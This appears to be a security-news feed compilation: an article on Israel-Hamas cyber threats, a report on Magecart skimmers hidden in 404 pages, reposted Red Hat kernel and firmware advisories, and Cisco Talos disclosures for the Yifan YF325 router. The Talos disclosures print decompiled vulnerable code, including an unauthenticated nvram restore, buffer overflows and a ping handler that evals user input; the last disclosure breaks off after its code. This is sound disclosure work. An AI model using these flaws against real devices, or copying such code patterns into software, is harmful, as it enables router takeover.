The Israeli-Hamas war will most assuredly impact businesses when it comes to ramped-up cyberattacks. Experts say that Israel's considerable collection of cybersecurity vendors be a major asset on the cyber-front.

Following the attacks on Israel by Hamas over the past days, when Prime Minister Benjamin Netanyahu warned Israelis "to brace themselves for a long and difficult war," attention turns to those cybersecurity vendors located in the Israeli tech hub and how they may contribute to the war effort.

Chris Pierson, CEO of BlackCloak, believes Israel's "substantive cybersecurity intelligence and strike capability" will serve it well, including having some of the best commercial cybersecurity companies in the world.

JP Castellanos, director of threat intelligence at Binary Defense, says that, particularly in light of potentially destructive attacks against IT or critical infrastructure, it is likely that Israeli cybersecurity companies will do all they can to help with the current crisis. "That means becoming more visible, not less," Castellanos says.

**Attacks Ramp Up During Wartime**

On the cyber front of the Gaza crisis, hacktivists have already begun preparing targets and offering their wares to the highest bidders, who may be looking to cause politically motivated website disruption on public-facing services. And indeed, there was a wave of notable distributed denial-of-service (DDoS) cyberattacks on Oct. 7 and Oct. 8, including one attack which reached 1.26 billion daily requests, while another other reached 346 million daily requests on Oct. 7, and 332 million daily requests the following day.

"Looking at these DDoS attacks in terms of requests per second, one of the impacted sites experienced a peak of 1.1 million requests per second," says João Tomé, content editor at Cloudflare.

But experts say they expect other kinds of attacks against companies and organizations in Israel to ramp up, carried out by both state-backed and non-state-backed operators with much larger arsenals than a DDoS botnet. Pierson for instance says the targets for attacks could be civilians as well as infrastructure and military targets.

"The most likely targets would be infrastructure as a whole - telecommunications, power, finance, and logistical transportation," he says.

It's already starting: Yossi Appleboum, CEO of Sepio Systems and a former member of the Israel Defense Force's Unit 8200, says cyberattacks against his company had increased by 100% in the last week.

Carlos Perez, research practice lead at TrustedSec, says retaliatory cyberattacks become more common during geopolitical crises, but says that many of these risks have been ongoing for Israeli companies, and they will continue to be vulnerable, as we have seen in the past. However Perez believes some companies will be ready, others will not. "It depends mainly on business buy-in and budgets: they do get targeted with a larger volume of attacks than most organizations, which puts them at a higher risk level."

**Call in the Reservists**

The Israeli military has summoned roughly 360,000 reservists — roughly four percent of Israel's 9.8 million population. Thus, the question for many companies in the region, is whether this will lead to staff leaving their day jobs, and for cybersecurity vendors, whether that will affect cyber defense.

Pierson says he expects those with special cyber intelligence training to be called to augment military teams on the ground, and expects those who have previously served their country to volunteer help and assistance for the war effort — and that could impact some operations. However, he does not foresee a change in marketing or external presence activities for most cybersecurity companies in Israel at the moment. 

Castellanos meanwhile believes with reservists being drafted, this would cause a momentary staff shortage until the conflict resolves. However, he adds that "in the case of cybersecurity vendors, I would imagine that Israel would take a balanced approach to this, because they certainly don't want to weaken the very vendors who will be playing a critical role in protecting Israel's national interests."

For his part, Sepio's Appleboum says some activities and features may be delayed or postponed due to staff shortages, but companies will prioritize what is important, "and this may affect current customers. Future planning can wait a bit."

Gaza Conflict: How Israeli Cybersecurity Will Respond

The novel technique helps hide the cybercriminal campaign's efforts to steal credit card information from visitors to major websites, and it represents an evolution for Magecart.

The collection of cybercriminal groups behind the infamous Magecart payment-card theft campaigns have come up with a previously unseen technique to hide their credit card skimming code, escaping notice for several weeks and infecting major e-commerce sites, including significant brands in the food and retail industries.

The obfuscation technique hides JavaScript code in a comment in a targeted site's 404 default page, Akamai stated in an advisory on Oct. 9. Other pages on the site have been modified only slightly to include a call to a nonexistent folder ("icons"), which triggers the 404 error, thus fetching the malicious page.

The entire attack code is contained in a comment with a specific placeholder, so the attacker's script can retrieve it, Roman Lvovsky, a security researcher at Akamai, explained in the company's advisory.

"This concealment technique is highly innovative and something we haven't seen in previous Magecart campaigns," he said. "The idea of manipulating the default 404 error page of a targeted website can offer Magecart actors various creative options for improved hiding and evasion."

**Hiding in 404 Pages: A Tactics Evolution**

Magecart attacks are a category of post-exploitation techniques for skimming credit card information and other user data from websites using obfuscated JavaScript, hijacking of forms, and malicious redirects. The embedded code often escapes notice by hiding in the complexity of modern websites, which rely heavily on third-party components, open source Web frameworks, and code obfuscated to protect intellectual property. Cybercriminals groups can hide their malicious content by either inserting it among the other obfuscated code or by compromising a third-party source of code or content.

Over the summer, for example, a Chinese-speaking threat group compromised Web-facing applications to skim credit card numbers in the Asia-Pacific region, and more recently, North American and Latin America, in a campaign dubbed "Silent Skimmer."

    

The payload hides the original credit-card form, overlaying it with a fake one. Source: Akamai

Similar to techniques hiding code in CSS files and images, adding code to the comments of a default 404 page escapes notice because many of the scanners used to detect attacks today were not designed to search such pages, says Ben Baryo, a cybersecurity researcher with Human Security, a bot- and fraud-protection service.

"While most scanners might report a missing resource, it’s likely that a 404 response won’t be analyzed," he says. "This detection evasion technique is mostly useful against synthetic scanners — which tend to ignore content in requests that aren’t returning 200 OK HTTP code — and manual inspections."

**Magecart Code Obfuscation & Overlays**

The modification to the default 404 pages are part of the Magecart campaign's efforts to deliver a payload — typically, the display of a fake form to collect credit card details — and maintain persistence. The cybercriminals used a fake form overlaying an original page's credit card information form to grab financial details from the targeted user, according to Akamai's advisory.

"When the user submits data into the attacker's fake form, an error is presented, the fake form is hidden, the original payment form is displayed, and the user is prompted to re-enter their payment details," Akamai's Lvovsky said, adding: "Submitting the fake form initiates an image network request to the attacker's C2 \[command-and-control\] server, carrying all the stolen personal and credit card information as a Base64-encoded string in the query parameter."

A 404 page is typically a first-party object — meaning that it resides on the same server as the home page and not a third-party service. This helps the attacker bypass some security measures, such as Content Security Policy (CSP) headers, he said.

Yet while the technique results in hard-to-discover modifications, it is not necessarily stealthy, says Human Security's Baryo. Because the 404 attack is kicked off by a call to the nonexistent "icons" resource, the technique could be considered noisy, which Magecart groups attempt to avoid.

"We haven’t seen this particular technique in the wild," he says. "We do not generally see other groups following this approach as this delivery method attracts unwanted attention as to why a nonexistent resource is being loaded on a particular page and by which script."

**Could PCI DSS Solve Magecart?**

The Payment Card Industry (PCI) Security Standards Council has attempted to solve the problem of Magecart attacks with the latest version of its Data Security Standard (DSS), which bolsters two security requirements to protect payment pages. Requirement 6 ("Develop and Maintain Secure Systems and Software") directs e-commerce sites to use secure development and maintenance to ensure that unauthorized code can't be injected into websites, while Requirement 11 ("Test Security of Systems and Networks Regularly") charges website owners to conduct ongoing monitoring of systems and networks to detect changes.

Online merchants — even ones that outsource all storage, processing, and transmission of account data to payment service providers — will have to abide by the PCI-DSS 4.0 requirements, says Jeff Zitomer, senior director of product management for Human Security.

"Modern websites ... source code at runtime from across the Internet to deliver critical business functionality," he says. "This forever-changing Nth-party code bypasses traditional security controls and enjoys nearly unlimited access in the browser, \[allowing\] attackers \[to\] exploit this attack surface through malicious script attacks."

The standard is currently considered a best practice but will become mandatory in early 2025.

Magecart Campaign Hijacks 404 Pages to Steal Data

Red Hat Security Advisory 2023-5627-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include bypass, null pointer, out of bounds write, and use-after-free vulnerabilities.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5627.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive. Going forward, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security, bug fix, and enhancement update  
Advisory ID:        RHSA-2023:5627-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:5627  
Issue date:         2023-10-10  
Revision:           01  
CVE Names:          CVE-2020-36558  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: use-after-free vulnerability in the perf_group_detach function of the Linux Kernel Performance Events (CVE-2023-2235)

* kernel: ipvlan: out-of-bounds write caused by unclear skb->cb (CVE-2023-3090)

* kernel: netfilter: use-after-free due to improper element removal in nft_pipapo_remove() (CVE-2023-4004)

* kernel: net/sched: Use-after-free vulnerabilities in the net/sched classifiers: cls_fw, cls_u32 and cls_route (CVE-2023-4128)

* kernel: nf_tables: stack-out-of-bounds-read in nft_byteorder_eval() (CVE-2023-35001)

* kernel: race condition in VT_RESIZEX ioctl when vc_cons[i].d is already NULL leading to NULL pointer dereference (CVE-2020-36558)

* kernel: LoadPin bypass via dm-verity table reload (CVE-2022-2503)

* kernel: an out-of-bounds vulnerability in i2c-ismt driver (CVE-2022-2873)

* kernel: xfrm_expand_policies() in net/xfrm/xfrm_policy.c can cause a refcount to be dropped twice (CVE-2022-36879)

* kernel: use-after-free due to race condition in qdisc_graft() (CVE-2023-0590)

* kernel: netfilter: NULL pointer dereference in nf_tables due to zeroed list head (CVE-2023-1095)

* kernel: hash collisions in the IPv6 connection lookup table (CVE-2023-1206)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

* [HPEMC RHEL 8 REGRESSION] acpi-cpufreq: Skip initialization if a cpufreq driver exists (BZ#2186307)

* [max] RHEL8.4 Pre-Alpha - [ 4.18.0-240.4.el8.dt2.ppc64le ][ fleetwood / P9 64TB/192c ] While performing DLPAR CPU operations \"BUG: arch topology borken\" messages are observed and CPU remove operation fails for removal of 140 with 255 return (BZ#2210295)

* [Intel 8.8 BUG] [SPR] IOMMU: QAT Device Address Translation Issue with Invalidation Completion Ordering (BZ#2221098)

* avoid unnecessary page fault retires on shared memory types (BZ#2221101)

* [i40e] error: Cannot set interface MAC/vlanid to 1e:b7:e2:02:b1:aa/0 for ifname ens4f0 vf 0: Resource temporarily unavailable (BZ#2228164)

* oops on cifs_mount due to null tcon (BZ#2229129)

* kernel panic due to stack overflow on ppc64le due to deep call chain. (BZ#2230268)

* [Hyper-V][RHEL 8]incomplete fc_transport implementation in storvsc causes null dereference in fc_timed_out() (BZ#2230744)

* Withdrawal: GFS2: couldn't freeze filesystem: -16 (BZ#2231826)

* [RHEL 8][Hyper-V]Excessive hv_storvsc driver logging with srb_status  SRB_STATUS_INTERNAL_ERROR  (0x30) (BZ#2231989)

* kernel-devel RPM cross-compiled by CKI contains host-arch scripts (BZ#2232138)

* RHEL-8: crypto: rng - Fix lock imbalance in crypto_del_rng (BZ#2232216)

* [Intel 8.9] iavf: Driver Update (BZ#2232400)

* Important iavf bug fixes July 2023 (BZ#2232401)

* iavf: hang in iavf_remove() - SNO node hangs after running systemctl reboot (BZ#2232404)

* [RHEL 8.9] Proactively backport locking fixes from upstream (BZ#2235394)

* NAT sport clash in OCP causing 1 second TCP connection establishment delay. (BZ#2236515)

* xfs: mount fails when device file name is long (BZ#2236814)

* netfilter: RHEL 8.8 phase 2 backports from upstream (BZ#2236817)

* swap deadlock when attempt to charge a page to a cgroup stalls waiting on I/O plugged on another task in swap code (BZ#2237686)

Enhancement(s):

* [Intel 8.7 FEAT] TSC: Avoid clock watchdog when not needed (BZ#2216051)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2020-36558

References:

https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2023-5627-01

Red Hat Security Advisory 2023-5607-01 - The linux-firmware packages contain all of the firmware files that are required by various devices to operate. Issues addressed include an information leakage vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5607.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive. Going forward, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: linux-firmware security and enhancement updateAdvisory ID:        RHSA-2023:5607-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:5607Issue date:         2023-10-10Revision:           01CVE Names:          CVE-2023-20593====================================================================Summary: An update for linux-firmware is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The linux-firmware packages contain all of the firmware files that are required by various devices to operate.Security Fix(es):* hw: amd: Cross-Process Information Leak (CVE-2023-20593)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Enhancement(s):* [Intel 9.0.z] Intel QAT Update - firmware for QAT (BZ#2168390)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-20593References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2023-5607-01

An authentication bypass vulnerability exists in the httpd nvram.cgi functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

An authentication bypass vulnerability exists in the httpd nvram.cgi functionality of Yifan YF325 v1.0\_20221108. A specially crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Yifan YF325 v1.0\_20221108

**PRODUCT URLS**

YF325 - https://yifanwireless.com/entry-level-wifi-router/yf325-series-gprs/3g/4g-wifi-router-with-sim-card-slot.html

**CVSSv3 SCORE**

9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-284 - Improper Access Control

**DETAILS**

The Yifan YF325 is an industrial cellular router. This device is designed for M2M and IOT applications, allowing remote management, offering several VPN services and many other features.

The YF325 router provides a series of APIs. The API that manages the nvram.cgi* endpoints uses the httpd’s parse_nvram_file function to manage the incoming data:

    void parse_nvram_file(undefined4 param_1,int fd,size_t content_length)
      {
        [...]
        do {
          if ((int)content_length < 1) break;
          read_size = 0x400;
          if (content_length + 1 < 0x401) {
            read_size = content_length + 1;
          }
          read_bytes = wfgets(temp_buf,read_size,fd);
          if (read_bytes == 0) {
            return;
          }
          current_len = strlen(temp_buf);
          content_length = content_length - current_len;
          is_equal = strncasecmp(temp_buf,"Content-Disposition:",0x14);
        } while ((is_equal != 0) || (pcVar3 = strstr(temp_buf,"name=\"file\""), pcVar3 == (char *)0x0));
        while (0 < (int)content_length) {
          read_bytes = wfgets(temp_buf,0x400,fd);
          if (read_bytes == 0) {
            return;
          }
          current_len = strlen(temp_buf);
          content_length = content_length - current_len;
          is_equal = strcmp(temp_buf,"\n");
          if ((is_equal == 0) || (is_equal = strcmp(temp_buf,"\r\n"), is_equal == 0)) break;
        }
        [...]
        restore_fd = fopen("/tmp/restore.bin","wb");
        [... read the request's uploaded file and write it into the "/tmp/restore.bin" file ...]
        res = nvram_restore("/tmp/restore.bin");
        [...]
        return;
      }
    

The nvram_restore function will open the file specified by the first argument, parse it and commit the new nvram variables. Because this function is reachable prior to authentication, this is a vulnerability. Indeed, an attacker could change the admin credentials of the device and obtain root access.

**TIMELINE**

2023-06-28 - Initial Vendor Contact  
2023-07-06 - Vendor Disclosure  
2023-10-11 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-24479: TALOS-2023-1762 || Cisco Talos Intelligence Group

A stack-based buffer overflow vulnerability exists in the httpd do_wds functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to stack-based buffer overflow. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A stack-based buffer overflow vulnerability exists in the httpd do\_wds functionality of Yifan YF325 v1.0\_20221108. A specially crafted network request can lead to stack-based buffer overflow. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Yifan YF325 v1.0\_20221108

**PRODUCT URLS**

YF325 - https://yifanwireless.com/entry-level-wifi-router/yf325-series-gprs/3g/4g-wifi-router-with-sim-card-slot.html

**CVSSv3 SCORE**

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-121 - Stack-based Buffer Overflow

**DETAILS**

The Yifan YF325 is an industrial cellular router. This device is designed for M2M and IOT applications, allowing remote management, offering several VPN services and many other features.

The YF325 router provides a series of APIs. The API that manages the Wireless_WDS* endpoints uses the httpd’s do_wds function:

    void do_wds(undefined4 param_1,char* URL_path,undefined4 fd)
    {
        [...]
        dash_in_URL = indexof(URL_path,L'-');                                                                       [1]
        strcpy(filename,URL_path + dash_in_URL + 1);                                                                [2]
        [...]
    } The `URL_path` parameter is the request's URL path without the leading slash. This function takes, at `[1]`, the index of the first `-` in `URL_path`; if there is no such character, the function `indexof` will return -1. At `[2]` the result of the `indexof` function is used to copy either the whole `URL_path` string if no `-` is present, or only the string after the `-` if it is. The string is copied into a static buffer. Because the function used to copy the string is `strcpy` and no check is performed on the length of what is copied, the `do_wds` function is vulnerable to a stack-based buffer overflow. This vulnerability can be reached without authentication.
    

**TIMELINE**

2023-06-28 - Initial Vendor Contact  
2023-07-06 - Vendor Disclosure  
2023-10-11 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-31272: TALOS-2023-1765 || Cisco Talos Intelligence Group

Two heap-based buffer overflow vulnerabilities exist in the gwcfg_cgi_set_manage_post_data functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger these vulnerabilities.This integer overflow result is used as argument for the malloc function.

**SUMMARY**

Two heap-based buffer overflow vulnerabilities exist in the gwcfg\_cgi\_set\_manage\_post\_data functionality of Yifan YF325 v1.0\_20221108. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger these vulnerabilities.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Yifan YF325 v1.0\_20221108

**PRODUCT URLS**

YF325 - https://yifanwireless.com/entry-level-wifi-router/yf325-series-gprs/3g/4g-wifi-router-with-sim-card-slot.html

**CVSSv3 SCORE**

9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-190 - Integer Overflow or Wraparound

**DETAILS**

The Yifan YF325 is an industrial cellular router. This device is designed for M2M and IOT applications, allowing remote management, offering several VPN services and many other features.

The YF325 router provides a series of APIs. The API that manages the gwcfg.cgi/set* endpoints uses the httpd’s gwcfg_cgi_set_manage_post_data function to parse the POST data:

    void gwcfg_cgi_set_manage_post_data(undefined4 URL,FILE **fd,int content_length)
    
    {
      [...]
    
      APP_TRACE("do_set_cfg_post,url:%s,len:%d\n",URL);
      if (POST_DATA == (char *)0x0) {
        POST_DATA = (char *)malloc(content_length + 1);                                                             [1]
      }
      else {
        POST_DATA = (char *)realloc(POST_DATA,content_length + 1);                                                  [2]
      }
      if (POST_DATA != (char *)0x0) {
        read_len = wfread(POST_DATA,1,content_length,fd);                                                           [3]
        [...]
      }
      return;
    }
    

The first thing checked is if the POST_DATA has already been initialized. Based on the answer, a malloc or a realloc is called to accommodate the actual request’s Content-Length.

The Content-Length is parsed in the manage_request function:

    void manage_request(void)
    {
      [... receive and parse the request until the start of the headers ...]
      [... peforms some checks and parse on the received data ... ]
      
      while( true ) {
        [... tmp_buff is a buffer just after current_header buffer ...]
        read_len = wfgets(current_header,(int)tmp_buff - (int)current_header,(char *)CLIENT_REQUEST_FD);
        if (((is_equal == 0) || (is_equal = strcmp(current_header,"\n"), is_equal == 0)) ||
            (is_equal = strcmp(current_header,"\r\n"), is_equal == 0)) break;
        is_equal = strncasecmp(current_header,"Authorization:",0xe);
        if (is_equal == 0) {
          [...]
        }
        else {
          is_equal = strncasecmp(current_header,"Referer:",8);
          if (is_equal == 0) {
            [...]
          }
          else {
            is_equal = strncasecmp(current_header,"Host:",5);
            if (is_equal == 0) {
              [...]
            }
            else {
              is_equal = strncasecmp(current_header,"Content-Length:",0xf);                                         [4]
              if (is_equal == 0) {
                content_length_value_ptr = current_header + 0xf;
                [...]
                content_length_empty_space = strspn(content_length_value_ptr," \t");
                content_length = content_length_value_ptr + content_length_empty_space;
                CONTENT_LENGTH = strtoul(content_length,(char **)0x0,0);
        [...]
      while( true ) {                                                                                               [5]
        URL_path_pattern = (code *)API_entry_cursor->URL_path_pattern;
        [... find the correct API entry based on the URL path pattern ...]
      }
      [...]
      post = 0;
      is_equal = strcasecmp(request_method,"post");
      if (is_equal == 0) {
        post = 1;
      }
      if ((code *)API_entry_cursor->manage_request_data != (code *)0x0) {
        (*(code *)API_entry_cursor->manage_request_data)
                  (request_URL+1,CLIENT_REQUEST_FD,CONTENT_LENGTH,boundary);                                        [6]
      }
      [...]
    }
    

The function will eventually parse, at [4], the Content-Length. Then, at [5], based on the URL path, the correct API entry struct to use is located. At [6], the manage_request_data function of the located API entry, if not null, is called. The manage_request_data struct field, for the gwcfg.cgi/set* API, corresponds to the gwcfg_cgi_set_manage_post_data function.

**CVE-2023-35967 - malloc integer overflow**

At [1] for the malloc function the requested size is content_length + 1. The + 1 is allegedly used to ensure there is enough space for the null terminator. Because the content_length value is never checked, an integer overflow vulnerability exists at [1] that can lead to a heap buffer overflow at [3].

**CVE-2023-35968 - realloc integer overflow**

At [2] for the realloc function the requested size is content_length + 1. The + 1 is allegedly used to ensure there is enough space for the null terminator. Because the content_length value is never checked, an integer overflow vulnerability exists at [2] that can lead to a heap buffer overflow at [3].

**TIMELINE**

2023-06-28 - Initial Vendor Contact  
2023-07-06 - Vendor Disclosure  
2023-10-11 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-35967: TALOS-2023-1788 || Cisco Talos Intelligence Group

Two heap-based buffer overflow vulnerabilities exist in the httpd manage_post functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger these vulnerabilities.This integer overflow result is used as argument for the malloc function.

**SUMMARY**

Two heap-based buffer overflow vulnerabilities exist in the httpd manage\_post functionality of Yifan YF325 v1.0\_20221108. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger these vulnerabilities.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Yifan YF325 v1.0\_20221108

**PRODUCT URLS**

YF325 - https://yifanwireless.com/entry-level-wifi-router/yf325-series-gprs/3g/4g-wifi-router-with-sim-card-slot.html

**CVSSv3 SCORE**

9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-190 - Integer Overflow or Wraparound

**DETAILS**

The Yifan YF325 is an industrial cellular router. This device is designed for M2M and IOT applications, allowing remote management, offering several VPN services and many other features.

The YF325 router provides a series of APIs. Many of those APIs, which expect to receive a POST request, use the manage_post function to manage the received POST data:

    void manage_post(undefined4 param_1,FILE **fd,int content_length)
    
    {
      [...]
      if (post == 1) {
        if (POST_DATA == (char *)0x0) {
          POST_DATA = (char *)malloc(content_length + 1U);                                                          [1]
        }
        else {
          POST_DATA = (char *)realloc(POST_DATA,content_length + 1U);                                               [2]
        }
        if ((POST_DATA != (char *)0x0) &&
           (data_end = wfread(POST_DATA,1,content_length,fd), [...])) {                                             [3]
          [...]
        }
      }
      [...]
    }
    

The first thing checked, after confirming that the request is actually a POST, is if the POST_DATA global variable has already been initialized. Based on the answer, a malloc or a realloc is called to accommodate the actual request’s Content-Length.

The Content-Length is parsed in the manage_request function:

    void manage_request(void)
    {
      [... receive and parse the request until the start of the headers ...]
      [... peforms some checks and parse on the received data ... ]
      
      while( true ) {
        [... tmp_buff is a buffer just after current_header buffer ...]
        read_len = wfgets(current_header,(int)tmp_buff - (int)current_header,(char *)CLIENT_REQUEST_FD);
        if (((is_equal == 0) || (is_equal = strcmp(current_header,"\n"), is_equal == 0)) ||
            (is_equal = strcmp(current_header,"\r\n"), is_equal == 0)) break;
        is_equal = strncasecmp(current_header,"Authorization:",0xe);
        if (is_equal == 0) {
          [...]
        }
        else {
          is_equal = strncasecmp(current_header,"Referer:",8);
          if (is_equal == 0) {
            [...]
          }
          else {
            is_equal = strncasecmp(current_header,"Host:",5);
            if (is_equal == 0) {
              [...]
            }
            else {
              is_equal = strncasecmp(current_header,"Content-Length:",0xf);                                         [4]
              if (is_equal == 0) {
                content_length_value_ptr = current_header + 0xf;
                [...]
                content_length_empty_space = strspn(content_length_value_ptr," \t");
                content_length = content_length_value_ptr + content_length_empty_space;
                CONTENT_LENGTH = strtoul(content_length,(char **)0x0,0);
        [...]
      while( true ) {                                                                                               [5]
        URL_path_pattern = (code *)API_entry_cursor->URL_path_pattern;
        [... find the correct API entry based on the URL path pattern ...]
      }
      [...]
      post = 0;
      is_equal = strcasecmp(request_method,"post");
      if (is_equal == 0) {
        post = 1;
      }
      if ((code *)API_entry_cursor->manage_request_data != (code *)0x0) {
        (*(code *)API_entry_cursor->manage_request_data)
                  (request_URL+1,CLIENT_REQUEST_FD,CONTENT_LENGTH,boundary);                                        [6]
      }
      [...]
    }
    

The function will eventually parse, at [4], the Content-Length. Then, at [5], based on the URL path, the correct API entry struct to use is located. At [6], the manage_request_data function of the located API entry, if not null, is called. The manage_request_data struct field, for several APIs, corresponds to the manage_post function.

**CVE-2023-35965 - malloc integer overflow**

Many API URL paths will eventually call the manage_post function. At [1] for the malloc function the requested size is content_length + 1. The + 1 is used to ensure there is enough space for the null terminator. Because the content_length value is never checked, it could correspond to the max unsigned integer, so, an integer overflow vulnerability exists at [1] that can lead to a heap buffer overflow at [3].

**CVE-2023-35966 - realloc integer overflow**

Many API URL paths will eventually call the manage_post function. At [2] for the realloc function the requested size is content_length + 1. The + 1 is used to ensure there is enough space for the null terminator. Because the content_length value is never checked, it could correspond to the max unsigned integer, so, an integer overflow vulnerability exists at [2] that can lead to a heap buffer overflow at [3].

**TIMELINE**

2023-06-28 - Initial Vendor Contact  
2023-07-06 - Vendor Disclosure  
2023-10-11 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-35965: TALOS-2023-1787 || Cisco Talos Intelligence Group

A command execution vulnerability exists in the validate.so diag_ping_start functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to command execution. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the validate.so diag\_ping\_start functionality of Yifan YF325 v1.0\_20221108. A specially crafted network request can lead to command execution. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Yifan YF325 v1.0\_20221108

**PRODUCT URLS**

YF325 - https://yifanwireless.com/entry-level-wifi-router/yf325-series-gprs/3g/4g-wifi-router-with-sim-card-slot.html

**CVSSv3 SCORE**

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-284 - Improper Access Control

**DETAILS**

The Yifan YF325 is an industrial cellular router. This device is designed for M2M and IOT applications, allowing remote management, offering several VPN services and many other features.

The YF325 offers several APIs, several of which are managed by the same httpd’s cgi_handler function:

    int cgi_handler(undefined mime,char *URL_path,int fd,char *query_string)
    
    {
      [...]
    
      if (post == 1) {
        request_data = POST_DATA;
      }
      else {
        request_data = URL_path;
        URL_path_ = strsep(&request_data,"?");
        if (URL_path_ != (char *)0x0) {
          URL_path = URL_path_;
        }
        init_cgi(request_data);
      }
      [...]
      need_reboot = (char *)websGetVar(fd,"need_reboot","0");
      need_rebot_value = atoi(need_reboot);
      change_action = (char *)websGetVar(fd,"change_action","");
      if ((change_action != (char *)0x0) && (is_gozila = strcmp(change_action,"gozila_cgi"), is_gozila == 0)) {
        gozila_cgi(fd,0,URL_path);
        [...]
      }
      [...]
    }
    

If the request’s change_action parameter is equal to gozila_cgi then the cgi_handler will call the gozila_cgi function:

    int gozila_cgi(int fd,undefined param_2,char *URL_path)
    
    {
        [...]
    
        nvram_set("gozila_action","1");
        my_next_page = '\0';
        submit_button = websGetVar(fd,"submit_button",0);                                                           [1]
        submit_type = websGetVar(fd,"submit_type",0);                                                               [2]
        godzila_ptr = (godzila_object *)handle_gozila_action(submit_button,submit_type);
        if (godzila_ptr == (godzila_object *)0x0) {
            [...]
        }
        else {
            [...]
            if (godzila_ptr->validate_function_name != (undefined *)0x0) {
                start_gozila(godzila_ptr->validate_function_name,fd);                                               [3]
            }
            [...]
        }
    }
    

This function will fetch at [1] and [2] the request’s submit_button and submit_type parameters. These two are used in the handle_gozila_action function to fetch the correct gozila_object struct into the godzila_ptr variable. The fetched struct is used at [3] to call the start_gozila function using the godzila_ptr->validate_function_name value. The godzila_ptr->validate_function_name value is a string representing, in most of the cases, a function defined in the validate.so library.

If the submit_button is equal to Ping and submit_type is equal to start then the godzila_ptr->validate_function_name would be the string diag_ping_start. Following the validate.so’s diag_ping_start function:

    void diag_ping_start(int fd)
    
    {
      char *ping_ip;
    
      ping_ip = (char *)(*UwebsGetVar)(fd,"ping_ip",0);                                                             [4]
      if ((ping_ip != (char *)0x0) && (*ping_ip != '\0')) {
        unlink("/tmp/ping.log");
        nvram_set("ping_ip",ping_ip);
        setenv("PATH","/sbin:/bin:/usr/sbin:/usr/bin",1);
        sysprintf("alias ping='ping -c 3'; eval \"%s\" > %s 2>&1 &",ping_ip,"/tmp/ping.log");                     [5]
        return;
      }
      return;
    }
    

